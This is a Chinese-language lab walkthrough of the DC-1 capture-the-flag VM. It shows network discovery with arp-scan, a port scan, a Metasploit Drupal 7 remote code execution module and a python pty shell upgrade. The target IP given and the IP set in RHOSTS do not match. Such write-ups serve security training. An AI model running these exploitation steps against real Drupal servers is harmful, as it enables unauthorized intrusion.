前言
靶機下載地址:DC-1
滲透機:kali2022.1 192.168.85.131
目標拿到5個flag
官方描述
資訊收集
1.獲得目標的ip(我們這是黑盒測驗所以通過mac地址來確定目標ip)
首先查看我們自己的ip
arp-scan -l
查看靶機的mac地址
這時我們可以確定目標為192.168.85.152
2.埠掃描
這個時候我們發現靶機開放了22,80,111埠
思路1:可以使用暴力破解ssh,獲得賬號密碼
思路2:從web方向下手
這里我們選擇思路2,暴力破解沒什么好說的
3.訪問目標網頁
通過wappalyzer插件我們發現這是一個cms-Drupal7以及關于服務器的一些資訊
(插件可以在火狐插件商城直接下載)
至此資訊收集結束
漏洞探測與利用
1.在kali中直接搜索這個cms看看有沒有相關的漏洞資訊
我們可以看到漏洞有很多
我們這里直接選擇遠程代碼執行這個漏洞
1.遠程代碼執行漏洞利用
啟動msf
msfconsole
搜索這個漏洞
search drupal 7.x
選擇這個漏洞
use 0
查看資訊
通過資訊可知我們只用設定ip即可
set RHOSTS 192.168.200.135
然后直接run就好
然后輸入shell
我們利用python生成一個完整的shell
python -c 'import pty;pty.spawn("/bin/bash")'
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/521824.html
標籤:其他
下一篇:Flink之狀態編程